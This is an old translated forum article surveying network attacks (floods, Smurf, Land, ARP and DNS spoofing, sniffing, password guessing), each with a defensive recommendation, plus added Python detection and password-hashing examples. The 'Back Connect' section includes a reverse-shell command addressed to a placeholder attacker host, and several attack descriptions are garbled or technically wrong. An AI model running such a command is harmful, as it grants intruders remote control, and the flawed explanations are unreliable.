Common security threats
16 March 2011, 13:46
Everyone probably knows that there are a great many kinds of security threats. Just how many there are, you can find out by reading on.


All of the material was taken from the sources linked below when they were available, so that no claims are raised against the author.

The same article is available at the following addresses:
http://forxakep.ucoz.ru/publ/3-1-0-16
http://forum.netall.ru/index.php?showtop ...
http://www.inattack.ru/article/402.html

Phishing.

A very broad term. Its purpose is to obtain information (passwords, credit card numbers and so on) or money from users. The technique is aimed not at one user but at many. For example, a letter supposedly from technical support is sent to all known customers of some bank. The letter usually asks the recipient to send the password to their account, allegedly because of some technical work. Even though users are warned that no employee may ever ask for such information and that it should never be disclosed, there are always some who gladly "give away" their numbers, passwords and so on. Such letters are usually very believable and well made, which is probably what impresses gullible users. It should be noted that there are several phishing techniques besides letters; some of the techniques described below, when applied correctly, are well suited to phishing (as a rule, we mention this in the description of the technique).
Recommendation: Remember that paranoia is the best protection. Do not trust anything suspicious and do not give your data to anyone. Administrators do not need to know your password if it is meant for access to their server: they fully manage the server and can see the password themselves or change it.



Social Engineering

These are not technical but psychological tricks. Using data obtained during enumeration, an attacker can call any user (for example on a corporate network) pretending to be an administrator and try to learn, say, a password from them. This becomes possible on large networks, where users do not know all the employees and, even more so, cannot always recognise them accurately over the phone. In addition, sophisticated psychological techniques are used, so the chance of success increases greatly.
Recommendation: The same. If there really is a need, hand over the required data in person. If you write your password down on paper, do not leave it lying around and, if possible, destroy it rather than simply throwing it in the trash.



Viruses.

The most famous common user problem. The essence is the introduction of malware onto the user's computer. The consequences vary and depend on the type of virus that infected the computer, but in general they range from stealing information to sending spam, organising DDoS attacks and taking complete control of the computer. Besides a file attached to a letter, a virus can get onto the computer through some OS vulnerability; these are described in our article "Rating of Windows vulnerabilities". There are a great many viruses, but they can still be classified. We do not want to reinvent the wheel, so you can use the information on this page http://school8.uriit.ru/people/av/class. ... where a classification of viruses with descriptions is given. The topic is covered in slightly more detail here http://fivt.krgtu.ru/kafedri/mo/site/ANT ...
Recommendation: Use antivirus software. Do not limit yourself to DrWEB or Kaspersky Anti-Virus (because they do not check the registry); use specialised anti-malware software such as Ad-Aware, SpyBot or XSpy. Also, do not open suspicious attachments and, in general, do not run programs from unknown senders. Even if you know the sender, check for viruses first. Here, as in medicine, prevention is easier than cure.



DoS (Denial of Service).

We would like to say that this is most likely not a separate attack but the result of one, used to knock the system, or individual programs, out of service. To this end the attacker crafts a request to a program in a special way, after which the program stops functioning. A restart is required to return the program to working order. It is often thought that DoS is the same as a Flood attack, and that all attacks leading to system failure should in general be grouped under the name DoS. We should note that:

--There is no common terminology; there are rather unspoken rules by which attacks are classified, so even in this article we present a somewhat conventional classification.
--As we have said, a denial of service can result not only from a Flood but also, for example, from a Buffer Overflow.

Therefore DoS can be described as the result of an attack, for example: "the denial of service was caused by such-and-such a Flood attack".



Flood (flow / flooding)

This type is quite controversial; it could partly be counted as DoS, but we wanted to highlight it separately. A certain number of machines (in this case the attack is called DDoS, Distributed Denial of Service), usually "zombies", send the victim the maximum possible number of requests (for example, connection requests). The victim cannot keep up with answering every request and eventually stops responding to users' requests; that is, it ceases to function properly. Note: bullying can also be called this type of attack when, for example, forums are filled with a lot of pointless posts. The following types of Flood can be distinguished:

--SYN Flood: flooding the attacked computer with SYN packets. As is known, the computer must reply to such a packet with a SYN/ACK packet. If there are too many SYN packets, the computer cannot keep up with answering each one and cannot receive packets from other computers.
--ICMP Flood or Ping Flood: the same, but with ICMP packets. The system must respond to each such packet, which creates a large number of packets that reduce the capacity (throughput) of the channel.
--Identification Flood (Ident Flood): similar to ICMP Flood, but responding to a request to port 113 (identd) occupies the system longer, so the attack is more effective.
--DNS Flood: the attack is directed at a DNS server. It is swamped with DNS requests that the server cannot keep up with, so it simply cannot answer your queries. As a result, you cannot visit websites.
--DDoS DNS: a fairly new attack for which we have not met a well-established name. In essence the technique is about the same as the previous one, the only difference being that the requests come from a large number of machines (the previous type does not exclude this). The address to which the DNS server should reply to these requests is that of the DNS server itself, so it is not only flooded with DNS queries but also sends them to itself. Thus the technique is more effective than the previous one, but also more complicated to implement.
--Boink (Bonk, Teardrop): the victim is sent a huge number of heavily fragmented packets, but the fragments are large. For each fragmented packet a special buffer is allocated in which the other pieces are later placed so they can be reassembled. A huge number of large fragments overflows the buffer and can provoke a crash or an emergency halt.
--Pong: the same as any of the species above, the only difference being that the sender's address is spoofed. This gives the attacker some anonymity.

Recommendation: each OS or router has its own; they are usually given in the technical documentation. Do not neglect them; clearly limit the number of allowed packets. Unfortunately, some species cannot be repelled by anything other than physically disconnecting. A properly configured firewall is often a panacea.
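As an added example (not from the original article), a small Python check that applies the "limit the number of allowed packets" idea to a constructed log of TCP flags: it counts, per source, the SYNs that were never completed with the client's ACK, and the peak SYN rate per second. The record format and the thresholds are assumptions.

```python
from collections import Counter

# Constructed sample, not real traffic: (timestamp_s, source_ip, dst_port, tcp_flags)
# Two ordinary clients complete the handshake (SYN, then ACK); four sources then
# send a burst of SYNs within one second and never send the final ACK.
SAMPLE = [
    (0.0, "10.0.0.5", 80, "S"), (0.1, "10.0.0.5", 80, "A"),
    (0.2, "10.0.0.6", 80, "S"), (0.3, "10.0.0.6", 80, "A"),
] + [(1.0 + i * 0.01, f"198.51.100.{i % 4}", 80, "S") for i in range(40)]

def syn_flood_report(records, max_half_open=5, max_syn_per_sec=20):
    """Flag sources holding too many half-open connections and a SYN rate above the limit.

    A half-open connection is counted as a client SYN without a later ACK from the same
    source (the third packet of the handshake). The thresholds are assumed values that a
    real deployment would take from the OS or router documentation.
    """
    syns, acks, syn_per_sec = Counter(), Counter(), Counter()
    for ts, src, _port, flags in records:
        if "S" in flags and "A" not in flags:   # client's initial SYN
            syns[src] += 1
            syn_per_sec[int(ts)] += 1
        elif "A" in flags:                        # ACK completing the handshake
            acks[src] += 1
    suspects = sorted(src for src in syns if syns[src] - acks[src] >= max_half_open)
    peak = max(syn_per_sec.values(), default=0)
    return {
        "suspects": suspects,
        "peak_syn_per_sec": peak,
        "flood": bool(suspects) or peak > max_syn_per_sec,
    }

if __name__ == "__main__":
    print(syn_flood_report(SAMPLE))
```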



Smurf (an attack exploiting implementation errors in the TCP/IP protocol)

Today this kind of attack is considered exotic, but earlier, when the TCP/IP protocol was fairly new, it contained some bugs that allowed, for example, substituting the IP address. Nevertheless, this type of attack is still used. Some experts distinguish TCP Smurf, UDP Smurf and ICMP Smurf; naturally, this division is based on the packet type.
Recommendation: CISCO switches provide good protection, as do many others, as well as recent software and firewalls that block broadcasts.


Ping-of-Death (or Jolt, SSPing)
The attack consists in sending the victim a fragmented ICMP packet whose fragment size is very large (64KB). Older operating systems such as Windows 95 hang. This attack can be carried out using the Shadow Security Scanner.
Recommendation: it is easier to upgrade the OS and abandon the old version.


UDP Storm

Used when the victim has at least two open UDP ports, each of which sends some response to the sender. For example, port 37 with a time server sends the current date and time in reply to a request. The attacker sends a UDP packet to one port of the victim, but as the sender specifies the victim's own address and the victim's second open UDP port. The two ports then begin answering each other indefinitely, which degrades performance. The storm stops as soon as one of the packets is lost (for example, because of resource overload).
Recommendation: If possible, avoid using services that accept UDP packets, or cut them off from the external network with a firewall.


UDP Bomb

The attacker sends the system a UDP packet with incorrect header fields. These can be broken arbitrarily (for example, an incorrect length of the fields or of the structure). This can lead to a crash.
Recommendation: update the software.


Land

The victim is sent a packet to a specific port, but the sender address is set to the victim's own address, and the source port equals the destination port (example: recipient 1.1.1.1 port 111, sender 1.1.1.1 port 111). The victim tries to connect to itself, which can hang the system. Such an attack can also be 100% effective against some routers.
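Several of the attacks above (Smurf via broadcast, Ping of Death, UDP Storm, Land) can be recognised from a single packet's headers. As an added example that is not from the original article, here is a Python packet classifier with those four rules run over constructed packet records; the protected network range, the field names and the set of reflecting UDP services are assumptions.

```python
from ipaddress import ip_address, ip_network

LAN = ip_network("192.0.2.0/24")        # assumed protected network (documentation range)
REFLECTING_UDP_PORTS = {7, 19, 37}      # echo, chargen, time: services that answer every datagram
MAX_IP_DATAGRAM = 65535                 # largest total length an IP datagram may reassemble to
ICMP_ECHO_REQUEST = 8

def classify(pkt):
    """Return the names of the rules matched by one packet record (empty list = ordinary).

    pkt is a dict with keys proto, src, dst, len and, where relevant, sport, dport,
    icmp_type and frag_offset (in 8-byte units, as in the IP header). Constructed format.
    """
    hits = []
    src, dst = ip_address(pkt["src"]), ip_address(pkt["dst"])
    proto = pkt["proto"]
    # Land: source equals destination and port equals port; the host would talk to itself.
    if proto in ("tcp", "udp") and src == dst and pkt["sport"] == pkt["dport"]:
        hits.append("land")
    # UDP Storm: both endpoints are services that reply to anything, so they would loop forever.
    if proto == "udp" and pkt["sport"] in REFLECTING_UDP_PORTS and pkt["dport"] in REFLECTING_UDP_PORTS:
        hits.append("udp-storm")
    # Smurf: echo request aimed at the broadcast address makes every host answer the (spoofed) source.
    if proto == "icmp" and pkt.get("icmp_type") == ICMP_ECHO_REQUEST and dst == LAN.broadcast_address:
        hits.append("smurf-broadcast")
    # Ping of Death: fragment offset plus this fragment's length exceeds what a datagram may hold.
    if proto == "icmp" and pkt.get("frag_offset", 0) * 8 + pkt["len"] > MAX_IP_DATAGRAM:
        hits.append("ping-of-death")
    return hits

def scan(packets):
    """Return [(index, hits)] for every packet that matched at least one rule."""
    return [(i, classify(p)) for i, p in enumerate(packets) if classify(p)]

# Constructed packets, not captured traffic.
SAMPLE_PACKETS = [
    {"proto": "tcp", "src": "203.0.113.7", "dst": "192.0.2.10", "sport": 51000, "dport": 80, "len": 60},
    {"proto": "tcp", "src": "192.0.2.10", "dst": "192.0.2.10", "sport": 111, "dport": 111, "len": 40},
    {"proto": "udp", "src": "192.0.2.10", "dst": "192.0.2.10", "sport": 37, "dport": 7, "len": 36},
    {"proto": "icmp", "src": "192.0.2.10", "dst": "192.0.2.255", "icmp_type": 8, "len": 84},
    {"proto": "icmp", "src": "203.0.113.7", "dst": "192.0.2.10", "icmp_type": 8, "frag_offset": 8100, "len": 1480},
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_PACKETS):
        print(index, hits)
```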


Mail Bombing

If the victim's computer hosts a mail server, a huge number of e-mail messages is sent to it in order to knock it out of service. On one hand this resembles a Flood, but on the other, if the messages contain large attachments that will be checked by the server's antivirus software, then scanning such a set of incoming attachments can significantly reduce performance or reduce it to nothing. In addition, these messages are stored on the server's hard drive and can fill it up, which can cause DoS. Of course, nowadays this attack is mostly history, but in some cases it can still be used.
Recommendation: competent mail server configuration.


Sniffing (eavesdropping on the network)

If hubs are installed in the network instead of switches, received packets are sent to all computers on the network, and only then does each computer determine whether the packet is meant for it. If an attacker gains access to a computer that is part of such a network, or to the network directly, the data transmitted within that network segment, including passwords, will be available to him. The attacker simply puts the network card into listening mode and accepts all packets regardless of whether they were meant for him. Console sniffers can be used, for example TcpDump (built into *NIX systems) or WinDump (for Windows, not built in), as well as ones with a graphical interface such as Iris.
Recommendation: Use switches instead of hubs; encrypt traffic.


IP Hijack

With physical access to a network, an attacker can "tap into" the network cable and act as an intermediary in packet transmission, thereby listening to all traffic between two computers. This is a very inconvenient method that is often not justified, except when no other method can be used. Such an intrusion is awkward in itself, although there are devices that make the task somewhat easier; in particular, they keep track of packet numbering to avoid failures and possible detection of the intrusion into the channel. This method has been used for ATM fraud, but that case is technically harder, because a break in the link between the bank and the ATM is unacceptable, and "penetrating" the channel without breaking it is a task only for highly qualified specialists. Besides, ATMs are now installed much better, which rules out free physical access to the cable.

Recommendation: control access to cabling, for example by using a cabinet. Encrypt traffic.


Dummy ARP (False ARP)

The ARP server (router or switch) knows which IP addresses belong to which MAC addresses (i.e. network cards). Given physical access to the network, an attacker can forge an ARP reply and impersonate another machine on the network, taking its IP. Thus all packets destined for that computer will reach him. This is possible if that computer is switched off; otherwise the action causes an IP address conflict (one network cannot have two computers with the same IP address).
Recommendation: Use software that reports when the MAC address for an IP changes, and watch the ARP server's log files.
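The recommendation above, software that reports a changed MAC for an IP, as an added Python example that is not from the original article: it parses a constructed log of ARP replies (the line format is assumed) and reports every IP that is re-announced with a different MAC, plus any single MAC that answers for several IPs.

```python
import re
from collections import defaultdict

# Assumed line format: "<date> <time> reply <ip> is-at <mac>" (constructed, not a real tool's output)
ARP_REPLY = re.compile(
    r"^(?P<ts>\S+ \S+) reply (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) is-at (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})$",
    re.IGNORECASE,
)

# Constructed sample log: the gateway 192.0.2.1 is first announced by its real card, then a
# second card starts answering for both the gateway and the host 192.0.2.20.
SAMPLE_LOG = """\
2011-03-16 13:46:01 reply 192.0.2.1 is-at 00:11:22:33:44:55
2011-03-16 13:46:02 reply 192.0.2.20 is-at 00:11:22:33:44:66
2011-03-16 13:46:10 reply 192.0.2.1 is-at de:ad:be:ef:00:01
2011-03-16 13:46:11 reply 192.0.2.20 is-at de:ad:be:ef:00:01
2011-03-16 13:46:12 reply 192.0.2.1 is-at de:ad:be:ef:00:01
"""

def watch_arp(log_text):
    """Return {"changes": [...], "multi_ip": {mac: [ips]}} from ARP reply lines.

    A change is reported whenever an IP is announced with a MAC different from the one
    currently recorded for it; the table is then updated so a flip back is reported too.
    """
    table = {}                    # ip -> mac currently recorded
    claims = defaultdict(set)     # mac -> every ip it has answered for
    changes = []
    for line in log_text.splitlines():
        m = ARP_REPLY.match(line.strip())
        if not m:
            continue              # ignore lines that are not ARP replies
        ip, mac = m["ip"], m["mac"].lower()
        claims[mac].add(ip)
        old = table.get(ip)
        if old is not None and old != mac:
            changes.append(f"{m['ts']}: {ip} moved from {old} to {mac}")
        table[ip] = mac
    multi_ip = {mac: sorted(ips) for mac, ips in claims.items() if len(ips) > 1}
    return {"changes": changes, "multi_ip": multi_ip}

if __name__ == "__main__":
    report = watch_arp(SAMPLE_LOG)
    print(*report["changes"], sep="\n")
    print(report["multi_ip"])
```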


Dummy DNS Server (false DNS server)

If the network settings are in automatic mode, a computer joining the network "asks" (i.e. sends a broadcast packet) who will be its DNS server, to which it will then send its DNS queries. With physical access to the network, an attacker can intercept the broadcast request and reply that his computer will be the DNS server. After that he can send the deceived victim along any route. For example, the victim wants to visit the bank's site and transfer funds; the attacker can direct it to his own computer, where a fabricated password form awaits. After that the password belongs to the attacker. This is a rather complicated method, because the attacker must answer the victim before the real DNS server does.

Recommendation: If possible, restrict access to outsiders.


Fuzzy

Filters can be configured to block certain packets, such as UDP. An attacker may craft a packet so that the filter does not recognise it as a UDP packet and does not filter it out, and it reaches its destination. Thus an attacker can bypass packet filters. This technique is very narrow and designed for special cases, more precisely those where the communication does not have to be two-way. Two-way communication is impossible in most cases, because generally, if incoming packets of a certain type are blocked on some port, outgoing ones are blocked too. So even if the crafted packet gets through the filter (e.g. on a UDP port), the server answers with a packet of the same type, i.e. UDP, but it will not craft it the way the cracker did. Thus this outgoing packet will be filtered and will not reach the cracker. Be that as it may, it is worth protecting yourself from such attacks.
Recommendation: usually new versions of firewalls provide sufficient protection against this trick.


Puke

The attacker fabricates an ICMP unreachable reply (wrong system) that causes the client to disconnect from the server. Used rather as an aid when some client needs to be disconnected from the server for the sake of an attack.
Fake unreachable: the attacker fabricates a message stating that the packet cannot be delivered (unreachable), thereby making the server think that the client has failed and packets are not reaching their destination. This can cause the server to disconnect the client. Also an auxiliary technique, similar to the previous one (Puke), but directed at the server rather than the client.


IP-Spoofing (substituting IP addresses)

The attacker replaces his real IP with a fictitious one. This is necessary when only certain IP addresses have access to a resource: the attacker needs to change his real IP to a "privileged" or "trusted" one to gain access. The method can also be used differently. Once two computers have established a connection and checked passwords, an attacker can overload the victim's network resources with specially generated packets. He can thus redirect traffic to himself and bypass the authentication procedure.
Recommendation: there can be many, because there are many tricks. But it is worth mentioning that the threat can be reduced (although legitimate connections will probably become harder) by reducing the timeout for a packet with the SYN and ACK flags set, and by increasing the maximum number of SYN connection requests in the queue (tcp_max_backlog). SYN cookies can also be used.
Host spoofing. A very complex technique that requires physical access to the network. Each computer knows the router to which it sends all its packets, which the router then delivers to the destination. When the router changes, a redirect notification is sent to each computer, after which the computer starts sending packets to the new router. An attacker can fabricate such a notification and pass himself off as the router, so he gains control over the traffic within the network segment.
Recommendation: control access to the network and to router changes. For example, you can monitor whether all the previous traffic (i.e. the old connections) has "appeared" on the new router.


Password guessing.

Used to log in to the system by guessing the password to an account. There are two types: trying all possible combinations of characters (BruteForce) and dictionary guessing. The first method is more effective, because whatever combination of characters you typed from the keyboard as a password will eventually be found, but it is extremely slow, especially if punctuation and so on are taken into account. The second method is fast, but if you entered a word that cannot be in the dictionary, for example "My-New-Password", then guessing it from the dictionary is impossible. There are many programs for password guessing, so we do not think it makes sense to name any particular one. Typically, programs, operating systems and so on store passwords in encrypted form, so even if an attacker gains access to the file, he will have to decrypt the passwords. He can do this for days on his home computer.
Recommendation: use complex passwords, preferably with punctuation marks. Limit the number of password attempts. Against password decryption only its complexity helps.
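The two recommendations above, limiting attempts and making stored passwords costly to recover, as an added Python example that is not from the original article: passwords are stored as salted PBKDF2 hashes (so offline guessing is slow) and an account is locked for a period after repeated failures. The attempt limit, lockout period and iteration count are assumed policy values.

```python
import hashlib
import hmac
import os

ITERATIONS = 200_000   # PBKDF2 work factor (assumed value): makes offline guessing slow

def hash_password(password, salt=None):
    """Return (salt, digest) using salted PBKDF2-HMAC-SHA256; a fresh random salt per password."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest

class Authenticator:
    """Checks passwords against stored hashes and locks an account after too many failures.

    clock is injectable so the lockout can be tested without sleeping; max_attempts and
    lockout_seconds are assumed policy values, not from the article.
    """
    def __init__(self, clock, max_attempts=3, lockout_seconds=300):
        self.clock, self.max_attempts, self.lockout_seconds = clock, max_attempts, lockout_seconds
        self.users = {}       # username -> (salt, digest)
        self.failures = {}    # username -> (count, time_of_last_failure)

    def register(self, username, password):
        self.users[username] = hash_password(password)

    def locked(self, username):
        count, last = self.failures.get(username, (0, 0.0))
        return count >= self.max_attempts and self.clock() - last < self.lockout_seconds

    def login(self, username, password):
        """Return True only for a correct password on an account that is not locked out."""
        if self.locked(username):
            return False          # refuse without checking: a locked account yields no information
        salt, digest = self.users.get(username, (b"\0" * 16, b"\0" * 32))
        candidate = hash_password(password, salt)[1]   # always hash, so unknown users cost the same
        ok = username in self.users and hmac.compare_digest(candidate, digest)
        if ok:
            self.failures.pop(username, None)          # success resets the failure counter
        else:
            count, _ = self.failures.get(username, (0, 0.0))
            self.failures[username] = (count + 1, self.clock())
        return ok
```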


Back Connect / Pipes / Reverse (reverse session)

This is an auxiliary method, but in itself it is very interesting. For example, an attacker does not want to perform many actions each time for the sake of a single command; this technique simplifies the task. Its essence is that the attacker forces the attacked computer to connect to the hacker's computer. For example, on the victim's computer one can run telnet [attacker.ip.address] [port]. After this the attacker in effect receives a command prompt (shell) on the victim's machine.


Software vulnerabilities (bugs)
Views: 1167 | Added by: w1zard | Rating: 0.0/0